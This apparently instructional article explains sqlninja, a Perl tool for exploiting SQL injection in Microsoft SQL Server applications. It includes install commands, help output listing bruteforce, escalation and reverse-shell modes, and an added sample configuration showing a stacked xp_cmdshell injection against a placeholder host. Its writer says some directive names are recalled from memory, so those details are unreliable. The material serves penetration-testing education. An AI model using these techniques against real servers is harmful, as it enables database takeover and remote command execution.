Most of you surely know sqlmap as the most widely used SQL injection tool for web applications. In this article we look at another one, sqlninja, an open-source tool written in Perl that specializes in exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their backend. It is not a scanner: it automates the takeover of the database server once an SQL injection vulnerability has already been found.

Its main purpose is to give the attacker remote access to the vulnerable database server even when the environment around that server is hostile (outbound connections filtered, xp_cmdshell disabled, and so on). It is intended for penetration testers and security analysts who want to verify what an SQL injection vulnerability can actually be used for.

What is SQL injection?

SQL injection is an attack in which the attacker, by manipulating a URL parameter, a form field or some other input of the web application, gets SQL of their own choosing included in the queries the application sends to its database. This bypasses the application's own access controls, so the attacker can read data from the entire database, modify it or even delete it. On Microsoft SQL Server, where several statements can be stacked in one query and the xp_cmdshell procedure runs operating-system commands, it can also lead to command execution on the database server itself, which is exactly what sqlninja is built to exploit.

It is one of the oldest and most dangerous attacks on web applications. OWASP (the Open Web Application Security Project) ranks injection flaws first in its Top 10 list of web application security risks (the OWASP Top 10).


Requirements and installation

Sqlninja runs on Unix-like operating systems that have a Perl interpreter, which means it is supported on the following platforms:

  • Linux
  • FreeBSD
  • Mac OS X
  • iOS

Sqlninja is not currently supported on Windows. You will find it pre-installed in Kali Linux, the Linux distribution for penetration testing.

Linux Ubuntu & Debian

Install Perl modules

Sqlninja depends on a number of Perl modules. To install them from CPAN, open a terminal and run the following. Net::RawIP and Net::Pcap compile against system libraries, so a C compiler and the libpcap development headers (libpcap-dev on Debian/Ubuntu) need to be present first:

perl -MCPAN -e "install Net::RawIP"
perl -MCPAN -e "install Net::Pcap"
perl -MCPAN -e "install Net::PcapUtils"
perl -MCPAN -e "install Net::Packet"
perl -MCPAN -e "install Net::DNS"
perl -MCPAN -e "install IO::Socket::SSL"

Installing sqlninja

To download and unpack the sqlninja archive and change into the extracted directory, open a terminal and run the following:

wget https://sourceforge.net/projects/sqlninja/files/sqlninja/sqlninja-0.2.999-alpha1.tgz
tar zxvf sqlninja-0.2.999-alpha1.tgz
cd sqlninja-0.2.999-alpha1

How to use it

Now let's look at the options sqlninja gives us.

Running sqlninja without arguments prints all the available options. The output below comes from the sqlninja package that Kali ships (release 0.2.6-r1, installed as /usr/bin/sqlninja); the 0.2.999 alpha downloaded above additionally offers the getdata mode listed further down.

root@horse:~# sqlninja
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
Usage: /usr/bin/sqlninja
      -m <mode> : Required. Available modes are:
          t/test - test whether the injection is working
          f/fingerprint - fingerprint user, xp_cmdshell and more
          b/bruteforce - bruteforce sa account
          e/escalation - add user to sysadmin server role
          x/resurrectxp - try to recreate xp_cmdshell
          u/upload - upload a .scr file
          s/dirshell - start a direct shell
          k/backscan - look for an open outbound port
          r/revshell - start a reverse shell
          d/dnstunnel - attempt a dns tunneled shell
          i/icmpshell - start a reverse ICMP shell
          c/sqlcmd - issue a 'blind' OS command
          m/metasploit - wrapper to Metasploit stagers
      -f <file> : configuration file (default: sqlninja.conf)
      -p <password> : sa password
      -w <wordlist> : wordlist to use in bruteforce mode (dictionary method
                      only)
      -g : generate debug script and exit (only valid in upload mode)
      -v : verbose output
      -d <mode> : activate debug
          1 - print each injected command
          2 - print each raw HTTP request
          3 - print each raw HTTP response
          all - all of the above
          ...see sqlninja-howto.html for details

Sqlninja's behaviour is driven by two things: the sqlninja.conf configuration file, which describes the target (the vulnerable HTTP request and the point where the SQL is injected) together with a few details of your own environment, and the command-line options, which select what the tool should do and how. The options are the following:

  • -m <attackmode>: required; selects the attack mode, i.e. what sqlninja should do. Possible values are:
    • test
    • fingerprint
    • bruteforce
    • escalation
    • resurrectxp
    • upload
    • dirshell
    • backscan
    • revshell
    • dnstunnel
    • icmpshell
    • metasploit
    • sqlcmd
    • getdata
  • -v: verbose output
  • -f <configuration file>: the configuration file to use (default: sqlninja.conf).
  • -p <'sa' password>: the password of the sa account. In escalation mode it is used to add the current database user to the sysadmin server role; in the other modes it is used to run the injected queries as sysadmin when the current user is not one already.
  • -w <wordlist>: list of candidate passwords for bruteforce mode (dictionary method only).
  • -g: generate the debug script and exit (valid in upload mode only).
  • -d <debug mode>: enables debug output for troubleshooting. Possible values are:
    • 1: print every command that is injected
    • 2: print every HTTP request sent to the target
    • 3: print every HTTP response received from the target
    • all: all of the above

A config file may look like this:
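The sample configuration that the sentence above introduces is missing from this copy of the article, so the following is an added example, written for this edit and not taken from the article or from the sqlninja distribution. It shows the part of sqlninja.conf that every mode needs: the complete HTTP request to the vulnerable page, with the __SQL2INJECT__ marker at the spot where sqlninja's own T-SQL is inserted. The target host, page and parameter are placeholders. The delimiters and the marker are the ones described in sqlninja-howto.html for the 0.2.6 series as I recall them; the same goes for the lhost, device and msfpath directives, so compare the file against the sqlninja.conf.example shipped in the tarball before relying on the names.

```conf
# sqlninja.conf (added example, not the article's own file)
#
# The target is described as a full HTTP request. sqlninja sends this
# request once per injected command, replacing __SQL2INJECT__ with its
# own T-SQL. Assumption: the page builds a query from the GET parameter
# "id" by string concatenation. As far as I recall the howto, the request
# line must carry the full URL including the scheme, since host, port and
# SSL are taken from it (https:// turns SSL on).
#
# Why the "1;" in front of the marker matters: the 1 satisfies the
# application's own WHERE clause and the semicolon ends that statement,
# so whatever sqlninja injects runs as a second, stacked statement:
#   SELECT ... WHERE id=1; exec master..xp_cmdshell 'whoami'
# Stacked queries plus xp_cmdshell are what every mode beyond test and
# fingerprint relies on, so run -m test and then -m fingerprint first;
# fingerprint tells you whether the user is sysadmin and whether
# xp_cmdshell is available (resurrectxp and escalation exist for when it
# is not).

--httprequest_start--
GET http://www.target.example/page.asp?id=1;__SQL2INJECT__ HTTP/1.0
Host: www.target.example
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close
--httprequest_end--

# Your own address, used by the backscan and reverse-shell modes, and the
# interface sqlninja sniffs on in backscan mode (placeholder values).
lhost = 192.0.2.10
device = eth0

# Path to the Metasploit installation; only the metasploit mode needs it.
msfpath = /opt/metasploit/msf3
```

With this file saved as sqlninja.conf in the current directory, `sqlninja -m test` is the first command to run; if the configuration file lives elsewhere, point sqlninja at it with `-f`. Adding `-d all` while setting things up shows the exact request that goes out and the response that comes back, which is the quickest way to spot a cookie or header the page requires that the request block is missing.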

For more detail on sqlninja, see the official documentation (sqlninja-howto.html, shipped with the tool) and the related video for a live demonstration of the techniques.

How did you like it? We look forward to your impressions.
